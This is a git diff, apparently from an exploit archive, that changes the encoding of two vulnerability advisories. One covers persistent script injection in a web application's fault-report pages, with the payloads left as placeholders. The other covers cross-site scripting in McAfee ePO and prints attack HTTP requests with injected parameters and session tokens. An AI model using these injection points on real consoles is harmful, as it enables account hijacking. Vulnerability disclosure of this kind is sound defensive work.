@@ -11,4 +11,4 @@ charset="windows-1251" Content-Transfer-Encoding: quoted-printable Content-Location: about:blank - - [PERSISTENT INJECTED SCRIPT CODE!]'=20 - src=3D"res://ieframe.dll/dnserrordiagoff_webOC.htm"> - [PERSISTENT INJECTED SCRIPT CODE!]'=20 - src=3D"res://ieframe.dll/dnserrordiagoff_webOC.htm"> - [PERSISTENT INJECTED SCRIPT CODE!]'=20 - src=3D"res://ieframe.dll/dnserrordiagoff_webOC.htm"> - =A31.00 - 10 - 10 - 0 - 0 - 0 - =A312.00 - - - - 12/24/2012 + [PERSISTENT INJECTED SCRIPT CODE!]' + src="res://ieframe.dll/dnserrordiagoff_webOC.htm"> + [PERSISTENT INJECTED SCRIPT CODE!]' + src="res://ieframe.dll/dnserrordiagoff_webOC.htm"> + [PERSISTENT INJECTED SCRIPT CODE!]' + src="res://ieframe.dll/dnserrordiagoff_webOC.htm"> + [PERSISTENT INJECTED SCRIPT CODE!]' + src="res://ieframe.dll/dnserrordiagoff_webOC.htm"> + =A31.00 + 10 + 10 + 0 + 0 + 0 + =A312.00 + + + + 12/24/2012 - BBA123G - Angled Building Block + BBA123G + Angled Building Block @@ -264,76 +264,76 @@ Code Review: - +

Fault Description

Created: 12/25/2012

- + = [PERSISTENT INJECTED SCRIPT CODE!] - +BORDER-RIGHT: #000000 1px solid" + border=0 cellSpacing=10 cellPadding=8 = +width="100%"> - +

Resolution

Resolved:

- + = [PERSISTENT INJECTED SCRIPT CODE!] - +BORDER-RIGHT: #000000 1px solid" + border=0 cellSpacing=10 cellPadding=8 = +width="100%"> - Fault = -Report Notes=20 + Fault = +Report Notes - + [PERSISTENT INJECTED SCRIPT CODE!] - +BORDER-RIGHT: #000000 1px solid" + border=0 cellSpacing=10 cellPadding=8 = +width="100%"> - Order Notes = + Order Notes = - + [PERSISTENT INJECTED SCRIPT CODE!] - - + ... @@ -353,25 +353,25 @@ Content-Type: multipart/related; X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.6157 - class=3Dstyle20>
- -
-


+ +
+



+src="" + width=323 height=99>

[PERSISTENT INJECTED SCRIPT CODE!]
[PERSISTENT INJECTED SCRIPT CODE!]

- - +
+ - +src="" + width=1 height=450> Risk: diff --git a/platforms/windows/webapps/26807.txt b/platforms/windows/webapps/26807.txt index c7ce2fee1..be2bb6a32 100755 --- a/platforms/windows/webapps/26807.txt +++ b/platforms/windows/webapps/26807.txt @@ -45,7 +45,7 @@ McAfee Solution: Item "a" will be addressed in ePO 4.6.7 due out in late Q3 2013. Item "b" has been addressed per Security Bulletin SB10043. -(https://kc.mcafee.com/corporate/index?page=3Dcontent&id=3DSB10043) +(https://kc.mcafee.com/corporate/index?page=content&id=SB10043) @@ -58,10 +58,10 @@ b. POST /console/createDashboardContainer.do HTTP/1.1 displayType=text_lookup&operator=eq&propKey=EPOLeafNode.AgentVersion&instanceId=&orion.user.security.token=ZCFbpCpy3ldihsCW&ajaxMode=standard c. POST /console/createDashboardContainer.do HTTP/1.1 -elementId=3DcustomURL.dashboard.factory%3Ainstance&index=3D2&pageid=3D30& -width=3D1118&height=3D557&refreshInterval=3D5&refreshIntervalUnit=3DMIN&filteringEnabled=3Dfalse&mo -nitorUrl=3Dhttp%3A%2F%2Fwww.xxxx.com"/>&orion.user.sec -urity.token=3D9BslgbJEv2JqQy3k&ajaxMode=3Dstandard +elementId=customURL.dashboard.factory%3Ainstance&index=2&pageid=30& +width=1118&height=557&refreshInterval=5&refreshIntervalUnit=MIN&filteringEnabled=false&mo +nitorUrl=http%3A%2F%2Fwww.xxxx.com"/>&orion.user.sec +urity.token=9BslgbJEv2JqQy3k&ajaxMode=standard d. GET /ComputerMgmt/sysDetPanelBoolPie.do?uid=1";&orion.user.security.token=ZCFbpCpy3ldihsCW&ajaxMode=standard HTTP/1.1